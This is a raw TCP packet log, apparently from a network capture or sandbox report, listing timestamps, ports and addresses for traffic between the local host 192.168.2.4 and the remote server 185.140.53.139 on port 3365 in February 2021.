Feb 23, 2021 08:05:05.331582069 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.331785917 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.331829071 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.331844091 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.331868887 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.331913948 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.333082914 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.333133936 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.333185911 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.334611893 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.334656000 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.334693909 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.334712029 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.334742069 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.334789991 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.337353945 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.337464094 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.337534904 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.337588072 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.340460062 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.340501070 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.340517998 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.425998926 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.506474972 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.506520033 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.506597042 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.507232904 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.508497000 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.508538961 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.508577108 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.508609056 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.508615971 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.508631945 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.508657932 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.508707047 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.513144970 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.514121056 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.514206886 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.516222000 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.517213106 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.517288923 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.518188000 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.519150019 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.519247055 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.520510912 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.520559072 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.520606995 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.530668020 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.530705929 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.530738115 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.530754089 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.530771017 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.530821085 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.534348965 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534385920 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534416914 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534440994 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.534451008 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534497976 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.534508944 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534540892 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534574032 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.534579992 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.543402910 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.543462992 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.543467045 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.544045925 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544085979 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544121981 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.544123888 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544167042 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.544173002 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544218063 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544258118 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544259071 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.544331074 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544370890 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.544374943 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.548059940 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.548104048 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.548265934 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.549504995 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.549556017 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.549578905 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.550144911 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.550194979 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.550224066 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.553267956 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.553322077 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.553343058 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.553870916 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.553916931 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.553934097 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.554583073 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.554626942 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.554636002 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.558324099 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.558388948 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.635260105 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.676230907 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.708489895 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.708556890 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.708599091 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.717617989 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.717660904 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.717709064 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.717724085 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.717755079 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.717824936 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.719543934 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.719584942 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.719633102 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.726552010 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.726593018 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.726674080 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.742568016 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.742629051 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.742739916 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.743128061 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.743168116 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.743221045 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.744184017 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.744230986 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.744318962 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.745486975 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745527029 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745574951 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745618105 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745630980 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.745656013 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745660067 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.745696068 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745734930 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745760918 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.745773077 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.745826960 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.749140024 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.749181032 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.749248028 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.754616976 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.754661083 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.754699945 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.754724979 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.754878044 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.754918098 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.754935980 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.756387949 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.756443977 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.756483078 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.756546974 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.756597996 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.759531021 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.759586096 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.759627104 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.759643078 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.759664059 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.759711027 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.761473894 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.761864901 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.761924982 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.761970043 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.763214111 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.763298035 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.772489071 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.772541046 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.772639990 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.773298025 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.773335934 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.773402929 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.774553061 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.774594069 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.774621964 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.774646997 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.774650097 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.774696112 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.883574963 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.908580065 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.908608913 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.908674955 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.925226927 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.925484896 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.926145077 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.926171064 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.927171946 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.927222013 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.928611040 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.928637981 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.932070971 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.933497906 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.933520079 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.933861017 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.938572884 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.938942909 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.946197987 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.947144985 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.947499037 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.948544025 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.949501991 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.950073957 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.950217009 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.951311111 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.951358080 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.951406956 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.952559948 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.952594042 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.952725887 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.956379890 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.956516981 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.957321882 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.957350016 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.957962990 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.958544970 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.958575010 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.958678007 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.959466934 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.959501982 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.959595919 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.968588114 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968614101 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968626976 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968703985 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968720913 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968734026 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.968827963 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968846083 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.968856096 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.968880892 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.972237110 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.972260952 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.972336054 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.973455906 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.973479986 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974013090 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.974452019 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974510908 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974550009 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.974586964 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974626064 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974644899 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974661112 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974672079 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.974723101 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.974772930 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974791050 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.974854946 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.974951982 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.975029945 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.975059986 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.976138115 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.976219893 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.977016926 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.977046967 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.977149963 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.977161884 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.978534937 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.978559017 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.978714943 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.987207890 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.987236023 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.987319946 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.988507032 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.988589048 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.006683111 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.126522064 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.126565933 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.126698017 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.126723051 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.127701998 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.127732992 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.127808094 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.127821922 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.141947985 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.141983986 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.142141104 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.142610073 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.142641068 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.142936945 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.143616915 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.143647909 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.143678904 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.143877029 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.144773006 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.144802094 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.144880056 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.144896984 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.145601988 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.145632982 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.145688057 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.145706892 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.146528959 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.146583080 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.146605968 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.146630049 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.147078037 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.147108078 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.147135019 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.147162914 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.147178888 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.147193909 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.159411907 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.159472942 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.159514904 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.159549952 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.159586906 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.159620047 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.159622908 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.162336111 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.162482977 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.162523985 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.162679911 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.162702084 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.163201094 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.163243055 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.163352966 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.163372993 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.164221048 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.164262056 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.165204048 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.165245056 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.165283918 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.165317059 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.166887045 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.174385071 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.174429893 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.174467087 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.174514055 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.174565077 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.174587965 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.174639940 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.176711082 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.176779032 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.177527905 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.177572966 CET	3365	49737	185.140.53.139	192.168.2.4
